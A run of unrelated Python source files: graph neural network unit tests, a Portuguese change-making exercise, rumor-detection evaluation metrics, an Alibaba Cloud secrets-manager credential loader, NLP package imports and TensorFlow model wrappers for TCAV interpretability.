# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================= from __future__ import absolute_import from __future__ import division from __future__ import print_function import unittest import random import numpy as np import tensorflow as tf from graphlearn.python.data.feature_spec import FeatureSpec from graphlearn.python.nn.tf.model.ego_gin import EgoGIN from graphlearn.python.nn.tf.model.ego_gin import HomoEgoGIN from graphlearn.python.nn.tf.data.entity import Vertex from graphlearn.python.nn.tf.data.ego_graph import EgoGraph from graphlearn.python.nn.tf.layers.ego_gin_layer import EgoGINLayer from graphlearn.python.nn.tf.layers.ego_gin_layer import EgoGINLayerGroup class EgoGINTestCase(unittest.TestCase): @classmethod def setUpClass(cls): pass @classmethod def tearDownClass(cls): pass def setUp(self): pass def tearDown(self): pass def test_homogeneous_graph(self): spec = FeatureSpec(10) for i in range(3): spec.append_dense() total_dim = 3 for i in range(7): dim = random.randint(8, 10) spec.append_sparse(20 + 10 * i, dim, False) total_dim += dim hops = [4, 5] # the centric vertices share the same spec with 2-hop neighbors schema = [("nodes", spec), ("nodes", spec), ("nodes", spec)] # [f_num, batch_size] = [3, 2] batch_floats = np.array([[1.0 * i, 2.0 * i] for i in range(3)]) batch_floats = tf.convert_to_tensor(batch_floats, dtype=tf.float32) # [i_num, batch_size] = [7, 2] batch_ints = np.array([[i, 2 * i] for i in range(7)]) batch_ints = tf.convert_to_tensor(batch_ints, dtype=tf.int64) vertices = Vertex(floats=batch_floats, ints=batch_ints) # [f_num, batch_size] = [3, 2 * 4] hop1_floats = np.array([[1.0 * i, 2.0 * i] * hops[0] for i in range(3)]) hop1_floats = tf.convert_to_tensor(hop1_floats, dtype=tf.float32) # [i_num, batch_size] = [7, 2 * 4] hop1_ints = np.array([[i, 2 * i] * hops[0] for i in range(7)]) hop1_ints = tf.convert_to_tensor(hop1_ints, dtype=tf.int64) neighbor_hop_1 = Vertex(floats=hop1_floats, ints=hop1_ints) # [f_num, batch_size] = [3, 2 * 4 * 5] hop2_floats = np.array([[1.0 * i, 2.0 * i] * hops[0] * hops[1] for i in range(3)]) hop2_floats = tf.convert_to_tensor(hop2_floats, dtype=tf.float32) # [i_num, batch_size] = [7, 2 * 4 * 5] hop2_ints = np.array([[i, 2 * i] * hops[0] * hops[1] for i in range(7)]) hop2_ints = tf.convert_to_tensor(hop2_ints, dtype=tf.int64) neighbor_hop_2 = Vertex(floats=hop2_floats, ints=hop2_ints) g = EgoGraph(vertices, [neighbor_hop_1, neighbor_hop_2], schema, hops) dims = np.array([total_dim, 16, 8]) model = HomoEgoGIN( dims, num_head=5, bn_fn=None, active_fn=tf.nn.relu, droput=0.1) embeddings = model.forward(g) with tf.Session() as sess: sess.run(tf.local_variables_initializer()) sess.run(tf.global_variables_initializer()) ret = sess.run(embeddings) self.assertListEqual([2, 8], list(ret.shape)) # [batch_size, output_dim] def test_heterogeneous_graph(self): u_spec = FeatureSpec(10) for i in range(3): u_spec.append_dense() u_total_dim = 3 for i in range(7): dim = random.randint(8, 10) u_spec.append_sparse(20 + 10 * i, dim, False) u_total_dim += dim i_spec = FeatureSpec(19) for i in range(6): i_spec.append_dense() i_total_dim = 6 for i in range(13): dim = random.randint(8, 11) i_spec.append_sparse(30 + 10 * i, dim, False) i_total_dim += dim u_out_dim = 16 i_out_dim = 12 out_dim = 9 hops = [4, 5] # the centric vertices share the same spec with 2-hop neighbors # metapath: u--i--i schema = [("u_nodes", u_spec), ("nbr", i_spec), ("nbr", i_spec)] # [f_num, batch_size] = [3, 2] batch_floats = np.array([[1.0 * i, 2.0 * i] for i in range(3)]) batch_floats = tf.convert_to_tensor(batch_floats, dtype=tf.float32) # [i_num, batch_size] = [7, 2] batch_ints = np.array([[i, 2 * i] for i in range(7)]) batch_ints = tf.convert_to_tensor(batch_ints, dtype=tf.int64) vertices = Vertex(floats=batch_floats, ints=batch_ints) # [f_num, batch_size] = [6, 2 * 4] hop1_floats = np.array([[1.0 * i, 2.0 * i] * hops[0] for i in range(6)]) hop1_floats = tf.convert_to_tensor(hop1_floats, dtype=tf.float32) # [i_num, batch_size] = [13, 2 * 4] hop1_ints = np.array([[i, 2 * i] * hops[0] for i in range(13)]) hop1_ints = tf.convert_to_tensor(hop1_ints, dtype=tf.int64) neighbor_hop_1 = Vertex(floats=hop1_floats, ints=hop1_ints) # [f_num, batch_size] = [6, 2 * 4 * 5] hop2_floats = np.array([[1.0 * i, 2.0 * i] * hops[0] * hops[1] for i in range(6)]) hop2_floats = tf.convert_to_tensor(hop2_floats, dtype=tf.float32) # [i_num, batch_size] = [13, 2 * 4 * 5] hop2_ints = np.array([[i, 2 * i] * hops[0] * hops[1] for i in range(13)]) hop2_ints = tf.convert_to_tensor(hop2_ints, dtype=tf.int64) neighbor_hop_2 = Vertex(floats=hop2_floats, ints=hop2_ints) g = EgoGraph(vertices, [neighbor_hop_1, neighbor_hop_2], schema, hops) layer_ui = EgoGINLayer("heter_uv", input_dim=(u_total_dim, i_total_dim), output_dim=u_out_dim, num_head=5) layer_ii = EgoGINLayer("heter_ii", input_dim=i_total_dim, output_dim=i_out_dim, num_head=5) layer_uii = EgoGINLayer("heter_uii", input_dim=(u_out_dim, i_out_dim), output_dim=out_dim, num_head=5) layer_group_1 = EgoGINLayerGroup([layer_ui, layer_ii]) layer_group_2 = EgoGINLayerGroup([layer_uii]) model = EgoGIN( [layer_group_1, layer_group_2], bn_fn=None, active_fn=tf.nn.relu, droput=0.1) embeddings = model.forward(g) with tf.Session() as sess: sess.run(tf.local_variables_initializer()) sess.run(tf.global_variables_initializer()) ret = sess.run(embeddings) self.assertListEqual([2, 9], list(ret.shape)) # [batch_size, output_dim] if __name__ == "__main__": unittest.main()
''' (1) - Indique como um troco deve ser dado utilizando-se um número mínimo de notas. Seu algoritmo deve ler o valor da conta a ser paga e o valor do pagamento efetuado desprezando os centavos. Suponha que as notas para troco sejam as de 50, 20, 10, 5, 2 e 1 reais, e que nenhuma delas esteja em falta no caixa ''' valor_da_conta = float(input('Entre com o valor da conta: ')) troco = [50,20, 10, 5, 2, 1] cont = 0 while valor_da_conta > 0: n = valor_da_conta/troco[cont] valor_da_conta = valor_da_conta%troco[cont] if n != 0: print('%d notas de R$ %.2f' %(n, troco[cont])) cont += 1 #Logica: imprime o troco até chegar o valor da conta que foi digitado pelo "caixa"
# -*- coding: utf-8 -*- """ @object: weibo & twitter @task: split train & test, evaluate performance @author: majing @variable: T, @time: Tue Nov 10 16:29:42 2015 """ import sys import random import os import re import math import numpy as np ################## evaluation of model result ##################### def evaluation(prediction, y): ## no. of time series TP = 0 TN = 0 FP = 0 FN = 0 e = 0.000001 threshhold = 0.5 fout = open(outevalPath, 'w') for i in range(len(y)): fout.write(str(y[i][0])+"\t"+str(prediction[i][0])+"\n") if y[i][0] == 1 and prediction[i][0] >= threshhold: TP += 1 if y[i][0] == 1 and prediction[i][0] < threshhold: FN += 1 if y[i][0] == 0 and prediction[i][0] >= threshhold: FP += 1 if y[i][0] == 0 and prediction[i][0] < threshhold: TN += 1 fout.close() accu = float(TP+TN)/(TP+TN+FP+FN+e) prec_r = float(TP)/(TP+FP+e) ## for rumor recall_r = float(TP)/(TP+FN+e) F_r = 2 * prec_r*recall_r / (prec_r + recall_r+e) prec_f = float(TN)/(TN+FN+e) ## for fact recall_f = float(TN)/(TN+FP+e) F_f = 2 * prec_f*recall_f / (prec_f + recall_f+e) return [accu, prec_r, recall_r, F_r, prec_f, recall_f, F_f] def evaluation_2class(prediction, y): # 4 dim TP1, FP1, FN1, TN1 = 0, 0, 0, 0 TP2, FP2, FN2, TN2 = 0, 0, 0, 0 e, RMSE, RMSE1, RMSE2 = 0.000001, 0.0, 0.0, 0.0 for i in range(len(y)): y_i, p_i = list(y[i]), list(prediction[i][0]) ##RMSE for j in range(len(y_i)): RMSE += (y_i[j]-p_i[j])**2 RMSE1 += (y_i[0]-p_i[0])**2 RMSE2 += (y_i[1]-p_i[1])**2 ## Pre, Recall, F Act = str(y_i.index(max(y_i))+1) Pre = str(p_i.index(max(p_i))+1) ## for class 1 if Act == '1' and Pre == '1': TP1 += 1 if Act == '1' and Pre != '1': FN1 += 1 if Act != '1' and Pre == '1': FP1 += 1 if Act != '1' and Pre != '1': TN1 += 1 ## for class 2 if Act == '2' and Pre == '2': TP2 += 1 if Act == '2' and Pre != '2': FN2 += 1 if Act != '2' and Pre == '2': FP2 += 1 if Act != '2' and Pre != '2': TN2 += 1 ## print result Acc_all = round( float(TP1+TP2)/float(len(y)+e), 4 ) Prec1 = round( float(TP1)/float(TP1+FP1+e), 4 ) Recll1 = round( float(TP1)/float(TP1+FN1+e), 4 ) F1 = round( 2*Prec1*Recll1/(Prec1+Recll1+e), 4 ) Prec2 = round( float(TP2)/float(TP2+FP2+e), 4 ) Recll2 = round( float(TP2)/float(TP2+FN2+e), 4 ) F2 = round( 2*Prec2*Recll2/(Prec2+Recll2+e), 4 ) RMSE_all = round( ( RMSE/len(y) )**0.5, 4) RMSE_all_1 = round( ( RMSE1/len(y) )**0.5, 4) RMSE_all_2 = round( ( RMSE2/len(y) )**0.5, 4) RMSE_all_avg = round( ( RMSE_all_1+RMSE_all_2 )/2, 4) return [Acc_all, RMSE_all, RMSE_all_avg, 'C1:', Prec1, Prec1, Recll1, F1,'\n', 'C2:', Prec2, Prec2, Recll2, F2,'\n'] def evaluation_4class(prediction, y): # 4 dim TP1, FP1, FN1, TN1 = 0, 0, 0, 0 TP2, FP2, FN2, TN2 = 0, 0, 0, 0 TP3, FP3, FN3, TN3 = 0, 0, 0, 0 TP4, FP4, FN4, TN4 = 0, 0, 0, 0 e, RMSE, RMSE1, RMSE2, RMSE3, RMSE4 = 0.000001, 0.0, 0.0, 0.0, 0.0, 0.0 for i in range(len(y)): y_i, p_i = list(y[i]), list(prediction[i]) ##RMSE for j in range(len(y_i)): RMSE += (y_i[j]-p_i[j])**2 RMSE1 += (y_i[0]-p_i[0])**2 RMSE2 += (y_i[1]-p_i[1])**2 RMSE3 += (y_i[2]-p_i[2])**2 RMSE4 += (y_i[3]-p_i[3])**2 ## Pre, Recall, F Act = str(y_i.index(max(y_i))+1) Pre = str(p_i.index(max(p_i))+1) #print y_i, p_i #print Act, Pre ## for class 1 if Act == '1' and Pre == '1': TP1 += 1 if Act == '1' and Pre != '1': FN1 += 1 if Act != '1' and Pre == '1': FP1 += 1 if Act != '1' and Pre != '1': TN1 += 1 ## for class 2 if Act == '2' and Pre == '2': TP2 += 1 if Act == '2' and Pre != '2': FN2 += 1 if Act != '2' and Pre == '2': FP2 += 1 if Act != '2' and Pre != '2': TN2 += 1 ## for class 3 if Act == '3' and Pre == '3': TP3 += 1 if Act == '3' and Pre != '3': FN3 += 1 if Act != '3' and Pre == '3': FP3 += 1 if Act != '3' and Pre != '3': TN3 += 1 ## for class 4 if Act == '4' and Pre == '4': TP4 += 1 if Act == '4' and Pre != '4': FN4 += 1 if Act != '4' and Pre == '4': FP4 += 1 if Act != '4' and Pre != '4': TN4 += 1 ## print result Acc_all = round( float(TP1+TP2+TP3+TP4)/float(len(y)+e), 4 ) Acc1 = round( float(TP1+TN1)/float(TP1+TN1+FN1+FP1+e), 4 ) Prec1 = round( float(TP1)/float(TP1+FP1+e), 4 ) Recll1 = round( float(TP1)/float(TP1+FN1+e), 4 ) F1 = round( 2*Prec1*Recll1/(Prec1+Recll1+e), 4 ) Acc2 = round( float(TP2+TN2)/float(TP2+TN2+FN2+FP2+e), 4 ) Prec2 = round( float(TP2)/float(TP2+FP2+e), 4 ) Recll2 = round( float(TP2)/float(TP2+FN2+e), 4 ) F2 = round( 2*Prec2*Recll2/(Prec2+Recll2+e), 4 ) Acc3 = round( float(TP3+TN3)/float(TP3+TN3+FN3+FP3+e), 4 ) Prec3 = round( float(TP3)/float(TP3+FP3+e), 4 ) Recll3 = round( float(TP3)/float(TP3+FN3+e), 4 ) F3 = round( 2*Prec3*Recll3/(Prec3+Recll3+e), 4 ) Acc4 = round( float(TP4+TN4)/float(TP4+TN4+FN4+FP4+e), 4 ) Prec4 = round( float(TP4)/float(TP4+FP4+e), 4 ) Recll4 = round( float(TP4)/float(TP4+FN4+e), 4 ) F4 = round( 2*Prec4*Recll4/(Prec4+Recll4+e), 4 ) microF = round( (F1+F2+F3+F4)/4,5 ) RMSE_all = round( ( RMSE/len(y) )**0.5, 4) RMSE_all_1 = round( ( RMSE1/len(y) )**0.5, 4) RMSE_all_2 = round( ( RMSE2/len(y) )**0.5, 4) RMSE_all_3 = round( ( RMSE3/len(y) )**0.5, 4) RMSE_all_4 = round( ( RMSE4/len(y) )**0.5, 4) RMSE_all_avg = round( ( RMSE_all_1+RMSE_all_2+RMSE_all_3+RMSE_all_4 )/4, 4) return ['acc:', Acc_all, 'Favg:',microF, RMSE_all, RMSE_all_avg, 'C1:',Acc1, Prec1, Recll1, F1, 'C2:',Acc2, Prec2, Recll2, F2, 'C3:',Acc3, Prec3, Recll3, F3, 'C4:',Acc4, Prec4, Recll4, F4] def write2Predict_oneVSall(prediction, y, resultPath): ## no. of time series fout = open(resultPath, 'w') for i in range(len(y)): fout.write(str(prediction[i][0])+"\n") fout.close() def write2Predict_4class(prediction, y, resultPath): ## no. of time series fout = open(resultPath, 'w') for i in range(len(y)): data1 = str(y[i][0])+' '+str(y[i][1])+' '+str(y[i][2])+' '+str(y[i][3]) data2 = str(prediction[i][0])+' '+str(prediction[i][1])+' '+str(prediction[i][2])+' '+str(prediction[i][3]) fout.write(data1+'\t'+data2+"\n") fout.close() #################################### MAIN ##############################################
from src.gui.Server import Server server = Server()
import json from alibaba_cloud_secretsmanager_client.model.client_key_credentials import ClientKeyCredential from alibaba_cloud_secretsmanager_client.model.credentials_properties import CredentialsProperties from alibaba_cloud_secretsmanager_client.model.region_info import RegionInfo from aliyunsdkcore.auth import credentials from alibaba_cloud_secretsmanager_client.utils import config_utils, const, env_const, client_key_utils def check_config_param(param, param_name): if param == "" or param is None: raise ValueError("credentials config missing required parameters[%s]" % param_name) def load_credentials_properties(file_name): if file_name is None or file_name == "": file_name = const.DEFAULT_CONFIG_NAME config_dict = config_utils.Properties(file_name).get_properties() credential = None region_info_list = [] secret_name_list = [] if config_dict is not None and len(config_dict) > 0: credentials_type = config_dict.get(env_const.ENV_CREDENTIALS_TYPE_KEY) access_key_id = config_dict.get(env_const.ENV_CREDENTIALS_ACCESS_KEY_ID_KEY) access_secret = config_dict.get(env_const.ENV_CREDENTIALS_ACCESS_SECRET_KEY) check_config_param(credentials_type, env_const.ENV_CREDENTIALS_TYPE_KEY) region_ids = config_dict.get(env_const.ENV_CACHE_CLIENT_REGION_ID_KEY) check_config_param(region_ids, env_const.ENV_CACHE_CLIENT_REGION_ID_KEY) try: region_dict_list = json.loads(region_ids) for region_dict in region_dict_list: region_info_list.append(RegionInfo( None if region_dict.get( env_const.ENV_REGION_REGION_ID_NAME_KEY) == '' else region_dict.get( env_const.ENV_REGION_REGION_ID_NAME_KEY), region_dict.get(env_const.ENV_REGION_VPC_NAME_KEY), None if region_dict.get( env_const.ENV_REGION_ENDPOINT_NAME_KEY) == '' else region_dict.get( env_const.ENV_REGION_ENDPOINT_NAME_KEY))) except Exception: raise ValueError( ("config param.get(%s) is illegal" % env_const.ENV_CACHE_CLIENT_REGION_ID_KEY)) if credentials_type == "ak": check_config_param(access_key_id, env_const.ENV_CREDENTIALS_ACCESS_KEY_ID_KEY) check_config_param(access_secret, env_const.ENV_CREDENTIALS_ACCESS_SECRET_KEY) credential = credentials.AccessKeyCredential(access_key_id, access_secret) elif credentials_type == "token": access_token_id = config_dict.get(env_const.ENV_CREDENTIALS_ACCESS_TOKEN_ID_KEY) access_token = config_dict.get(env_const.ENV_CREDENTIALS_ACCESS_TOKEN_KEY) check_config_param(access_token_id, env_const.ENV_CREDENTIALS_ACCESS_TOKEN_ID_KEY) check_config_param(access_token, env_const.ENV_CREDENTIALS_ACCESS_TOKEN_KEY) credential = credentials.AccessKeyCredential(access_token_id, access_token) elif credentials_type == "ram_role" or credentials_type == "sts": role_session_name = config_dict.get(env_const.ENV_CREDENTIALS_ROLE_SESSION_NAME_KEY) role_arn = config_dict.get(env_const.ENV_CREDENTIALS_ROLE_ARN_KEY) check_config_param(access_key_id, env_const.ENV_CREDENTIALS_ACCESS_KEY_ID_KEY) check_config_param(access_secret, env_const.ENV_CREDENTIALS_ACCESS_SECRET_KEY) check_config_param(role_session_name, env_const.ENV_CREDENTIALS_ROLE_SESSION_NAME_KEY) check_config_param(role_arn, env_const.ENV_CREDENTIALS_ROLE_ARN_KEY) credential = credentials.RamRoleArnCredential(access_key_id, access_secret, role_arn, role_session_name) elif credentials_type == "ecs_ram_role": role_name = config_dict.get(env_const.ENV_CREDENTIALS_ROLE_NAME_KEY) check_config_param(role_name, env_const.ENV_CREDENTIALS_ROLE_NAME_KEY) credential = credentials.EcsRamRoleCredential(role_name) elif credentials_type == "client_key": client_key_path = config_dict.get(env_const.EnvClientKeyPrivateKeyPathNameKey) check_config_param(client_key_path, env_const.EnvClientKeyPrivateKeyPathNameKey) password = client_key_utils.get_password(config_dict) cred, signer = client_key_utils.load_rsa_key_pair_credential_and_client_key_signer( client_key_path, password) credential = ClientKeyCredential(signer, cred) else: raise ValueError(("config param.get(%s) is illegal" % env_const.ENV_CREDENTIALS_TYPE_KEY)) secret_names = config_dict.get(const.PROPERTIES_SECRET_NAMES_KEY) if secret_names != "" and secret_names is not None: secret_name_list.extend(secret_names.split(",")) credential_properties = CredentialsProperties(credential, secret_name_list, region_info_list, config_dict) return credential_properties return None
# flake8: noqa """ __init__.py for import child .py files isort:skip_file """ # Utility classes & functions import pororo.tasks.utils from pororo.tasks.utils.download_utils import download_or_load from pororo.tasks.utils.base import ( PororoBiencoderBase, PororoFactoryBase, PororoGenerationBase, PororoSimpleBase, PororoTaskGenerationBase, ) # Factory classes from pororo.tasks.age_suitability import PororoAgeSuitabilityFactory from pororo.tasks.automated_essay_scoring import PororoAesFactory from pororo.tasks.automatic_speech_recognition import PororoAsrFactory from pororo.tasks.collocation import PororoCollocationFactory from pororo.tasks.constituency_parsing import PororoConstFactory from pororo.tasks.dependency_parsing import PororoDpFactory from pororo.tasks.fill_in_the_blank import PororoBlankFactory from pororo.tasks.grammatical_error_correction import PororoGecFactory from pororo.tasks.grapheme_conversion import PororoP2gFactory from pororo.tasks.image_captioning import PororoCaptionFactory from pororo.tasks.morph_inflection import PororoInflectionFactory from pororo.tasks.lemmatization import PororoLemmatizationFactory from pororo.tasks.named_entity_recognition import PororoNerFactory from pororo.tasks.natural_language_inference import PororoNliFactory from pororo.tasks.optical_character_recognition import PororoOcrFactory from pororo.tasks.paraphrase_generation import PororoParaphraseFactory from pororo.tasks.paraphrase_identification import PororoParaIdFactory from pororo.tasks.phoneme_conversion import PororoG2pFactory from pororo.tasks.pos_tagging import PororoPosFactory from pororo.tasks.question_generation import PororoQuestionGenerationFactory from pororo.tasks.machine_reading_comprehension import PororoMrcFactory from pororo.tasks.semantic_role_labeling import PororoSrlFactory from pororo.tasks.semantic_textual_similarity import PororoStsFactory from pororo.tasks.sentence_embedding import PororoSentenceFactory from pororo.tasks.sentiment_analysis import PororoSentimentFactory from pororo.tasks.contextualized_embedding import PororoContextualFactory from pororo.tasks.text_summarization import PororoSummarizationFactory from pororo.tasks.tokenization import PororoTokenizationFactory from pororo.tasks.machine_translation import PororoTranslationFactory from pororo.tasks.word_embedding import PororoWordFactory from pororo.tasks.word_translation import PororoWordTranslationFactory from pororo.tasks.zero_shot_classification import PororoZeroShotFactory from pororo.tasks.review_scoring import PororoReviewFactory from pororo.tasks.speech_translation import PororoSpeechTranslationFactory
from . import algorithms, buffers, noise, transition __all__ = ["algorithms", "buffers", "noise", "transition"]
"""Copyright 2018 Google LLC Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at https://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function from abc import ABCMeta from abc import abstractmethod from six.moves import zip import numpy as np import six import tensorflow as tf from google.protobuf import text_format class ModelWrapper(six.with_metaclass(ABCMeta, object)): """Simple wrapper of the for models with session object for TCAV. Supports easy inference with no need to deal with the feed_dicts. """ @abstractmethod def __init__(self, model_path=None, node_dict=None): """Initialize the wrapper. Optionally create a session, load the model from model_path to this session, and map the input/output and bottleneck tensors. Args: model_path: one of the following: 1) Directory path to checkpoint 2) Directory path to SavedModel 3) File path to frozen graph.pb 4) File path to frozen graph.pbtxt node_dict: mapping from a short name to full input/output and bottleneck tensor names. Users should pass 'input' and 'prediction' as keys and the corresponding input and prediction tensor names as values in node_dict. Users can additionally pass bottleneck tensor names for which gradient Ops will be added later. """ # A dictionary of bottleneck tensors. self.bottlenecks_tensors = None # A dictionary of input, 'logit' and prediction tensors. self.ends = None # The model name string. self.model_name = None # a place holder for index of the neuron/class of interest. # usually defined under the graph. For example: # with g.as_default(): # self.tf.placeholder(tf.int64, shape=[None]) self.y_input = None # The tensor representing the loss (used to calculate derivative). self.loss = None # If tensors in the loaded graph are prefixed with 'import/' self.import_prefix = False if model_path: self._try_loading_model(model_path) if node_dict: self._find_ends_and_bottleneck_tensors(node_dict) def _try_loading_model(self, model_path): """ Load model from model_path. TF models are often saved in one of the three major formats: 1) Checkpoints with ckpt.meta, ckpt.data, and ckpt.index. 2) SavedModel format with saved_model.pb and variables/. 3) Frozen graph in .pb or .pbtxt format. When model_path is specified, model is loaded in one of the three formats depending on the model_path. When model_path is ommitted, child wrapper is responsible for loading the model. """ try: self.sess = tf.Session(graph=tf.Graph()) with self.sess.graph.as_default(): if tf.io.gfile.isdir(model_path): ckpt = tf.train.latest_checkpoint(model_path) if ckpt: tf.compat.v1.logging.info('Loading from the latest checkpoint.') saver = tf.train.import_meta_graph(ckpt + '.meta') saver.restore(self.sess, ckpt) else: tf.compat.v1.logging.info('Loading from SavedModel dir.') tf.saved_model.loader.load(self.sess, ['serve'], model_path) else: input_graph_def = tf.compat.v1.GraphDef() if model_path.endswith('.pb'): tf.compat.v1.logging.info('Loading from frozen binary graph.') with tf.io.gfile.GFile(model_path, 'rb') as f: input_graph_def.ParseFromString(f.read()) else: tf.compat.v1.logging.info('Loading from frozen text graph.') with tf.io.gfile.GFile(model_path) as f: text_format.Parse(f.read(), input_graph_def) tf.import_graph_def(input_graph_def) self.import_prefix = True except Exception as e: template = 'An exception of type {0} occurred ' \ 'when trying to load model from {1}. ' \ 'Arguments:\n{2!r}' tf.compat.v1.logging.warn(template.format(type(e).__name__, model_path, e.args)) def _find_ends_and_bottleneck_tensors(self, node_dict): """ Find tensors from the graph by their names. Depending on how the model is loaded, tensors in the graph may or may not have 'import/' prefix added to every tensor name. This is true even if the tensors already have 'import/' prefix. The 'ends' and 'bottlenecks_tensors' dictionary should map to tensors with the according name. """ self.bottlenecks_tensors = {} self.ends = {} for k, v in six.iteritems(node_dict): if self.import_prefix: v = 'import/' + v tensor = self.sess.graph.get_operation_by_name(v.strip(':0')).outputs[0] if k == 'input' or k == 'prediction': self.ends[k] = tensor else: self.bottlenecks_tensors[k] = tensor def _make_gradient_tensors(self): """Makes gradient tensors for all bottleneck tensors.""" self.bottlenecks_gradients = {} for bn in self.bottlenecks_tensors: self.bottlenecks_gradients[bn] = tf.gradients( self.loss, self.bottlenecks_tensors[bn])[0] def get_gradient(self, acts, y, bottleneck_name, example): """Return the gradient of the loss with respect to the bottleneck_name. Args: acts: activation of the bottleneck y: index of the logit layer bottleneck_name: name of the bottleneck to get gradient wrt. example: input example. Unused by default. Necessary for getting gradients from certain models, such as BERT. Returns: the gradient array. """ return self.sess.run(self.bottlenecks_gradients[bottleneck_name], { self.bottlenecks_tensors[bottleneck_name]: acts, self.y_input: y }) def get_predictions(self, examples): """Get prediction of the examples. Args: imgs: array of examples to get predictions Returns: array of predictions """ return self.adjust_prediction( self.sess.run(self.ends['prediction'], {self.ends['input']: examples})) def adjust_prediction(self, pred_t): """Adjust the prediction tensor to be the expected shape. Defaults to a no-op, but necessary to override for GoogleNet Returns: pred_t: pred_tensor. """ return pred_t def reshape_activations(self, layer_acts): """Reshapes layer activations as needed to feed through the model network. Override this for models that require reshaping of the activations for use in TCAV. Args: layer_acts: Activations as returned by run_examples. Returns: Activations in model-dependent form; the default is a squeezed array (i.e. at most one dimensions of size 1). """ return np.asarray(layer_acts).squeeze() def label_to_id(self, label): """Convert label (string) to index in the logit layer (id). Override this method if label to id mapping is known. Otherwise, default id 0 is used. """ tf.compat.v1.logging.warn('label_to_id undefined. Defaults to returning 0.') return 0 def id_to_label(self, idx): """Convert index in the logit layer (id) to label (string). Override this method if id to label mapping is known. """ return str(idx) def run_examples(self, examples, bottleneck_name): """Get activations at a bottleneck for provided examples. Args: examples: example data to feed into network. bottleneck_name: string, should be key of self.bottlenecks_tensors Returns: Activations in the given layer. """ return self.sess.run(self.bottlenecks_tensors[bottleneck_name], {self.ends['input']: examples}) class ImageModelWrapper(ModelWrapper): """Wrapper base class for image models.""" def __init__(self, image_shape): super(ModelWrapper, self).__init__() # shape of the input image in this model self.image_shape = image_shape def get_image_shape(self): """returns the shape of an input image.""" return self.image_shape class PublicImageModelWrapper(ImageModelWrapper): """Simple wrapper of the public image models with session object.""" def __init__(self, sess, model_fn_path, labels_path, image_shape, endpoints_dict, scope): super(PublicImageModelWrapper, self).__init__(image_shape) self.labels = tf.io.gfile.GFile(labels_path).read().splitlines() self.ends = PublicImageModelWrapper.import_graph( model_fn_path, endpoints_dict, self.image_value_range, scope=scope) self.bottlenecks_tensors = PublicImageModelWrapper.get_bottleneck_tensors( scope) graph = tf.compat.v1.get_default_graph() # Construct gradient ops. with graph.as_default(): self.y_input = tf.compat.v1.placeholder(tf.int64, shape=[None]) self.pred = tf.expand_dims(self.ends['prediction'][0], 0) self.loss = tf.reduce_mean( tf.compat.v1.nn.softmax_cross_entropy_with_logits_v2( labels=tf.one_hot( self.y_input, self.ends['prediction'].get_shape().as_list()[1]), logits=self.pred)) self._make_gradient_tensors() def id_to_label(self, idx): return self.labels[idx] def label_to_id(self, label): return self.labels.index(label) @staticmethod def create_input(t_input, image_value_range): """Create input tensor.""" def forget_xy(t): """Forget sizes of dimensions [1, 2] of a 4d tensor.""" zero = tf.identity(0) return t[:, zero:, zero:, :] t_prep_input = t_input if len(t_prep_input.shape) == 3: t_prep_input = tf.expand_dims(t_prep_input, 0) t_prep_input = forget_xy(t_prep_input) lo, hi = image_value_range t_prep_input = lo + t_prep_input * (hi - lo) return t_input, t_prep_input # From Alex's code. @staticmethod def get_bottleneck_tensors(scope): """Add Inception bottlenecks and their pre-Relu versions to endpoints dict.""" graph = tf.compat.v1.get_default_graph() bn_endpoints = {} for op in graph.get_operations(): if op.name.startswith(scope + '/') and 'Concat' in op.type: name = op.name.split('/')[1] bn_endpoints[name] = op.outputs[0] return bn_endpoints # Load graph and import into graph used by our session @staticmethod def import_graph(saved_path, endpoints, image_value_range, scope='import'): t_input = tf.compat.v1.placeholder(np.float32, [None, None, None, 3]) graph = tf.Graph() assert graph.unique_name(scope, False) == scope, ( 'Scope "%s" already exists. Provide explicit scope names when ' 'importing multiple instances of the model.') % scope graph_def = tf.compat.v1.GraphDef.FromString( tf.io.gfile.GFile(saved_path, 'rb').read()) with tf.name_scope(scope) as sc: t_input, t_prep_input = PublicImageModelWrapper.create_input( t_input, image_value_range) graph_inputs = {} graph_inputs[endpoints['input']] = t_prep_input myendpoints = tf.import_graph_def( graph_def, graph_inputs, list(endpoints.values()), name=sc) myendpoints = dict(list(zip(list(endpoints.keys()), myendpoints))) myendpoints['input'] = t_input return myendpoints class GoogleNetWrapper_public(PublicImageModelWrapper): def __init__(self, sess, model_saved_path, labels_path): image_shape_v1 = [224, 224, 3] self.image_value_range = (-117, 255 - 117) endpoints_v1 = dict( input='input:0', logit='softmax2_pre_activation:0', prediction='output2:0', pre_avgpool='mixed5b:0', logit_weight='softmax2_w:0', logit_bias='softmax2_b:0', ) self.sess = sess super(GoogleNetWrapper_public, self).__init__( sess, model_saved_path, labels_path, image_shape_v1, endpoints_v1, scope='v1') self.model_name = 'GoogleNet_public' def adjust_prediction(self, pred_t): # Each pred outputs 16, 1008 matrix. The prediction value is the first row. # Following tfzoo convention. return pred_t[::16] class InceptionV3Wrapper_public(PublicImageModelWrapper): def __init__(self, sess, model_saved_path, labels_path): self.image_value_range = (-1, 1) image_shape_v3 = [299, 299, 3] endpoints_v3 = dict( input='Mul:0', logit='softmax/logits:0', prediction='softmax:0', pre_avgpool='mixed_10/join:0', logit_weight='softmax/weights:0', logit_bias='softmax/biases:0', ) self.sess = sess super(InceptionV3Wrapper_public, self).__init__( sess, model_saved_path, labels_path, image_shape_v3, endpoints_v3, scope='v3') self.model_name = 'InceptionV3_public' class MobilenetV2Wrapper_public(PublicImageModelWrapper): def __init__(self, sess, model_saved_path, labels_path): self.image_value_range = (-1, 1) image_shape_v2 = [224, 224, 3] endpoints_v2 = dict( input='input:0', prediction='MobilenetV2/Predictions/Reshape:0', ) self.sess = sess super(MobilenetV2Wrapper_public, self).__init__( sess, model_saved_path, labels_path, image_shape_v2, endpoints_v2, scope='MobilenetV2') # define bottleneck tensors and their gradients 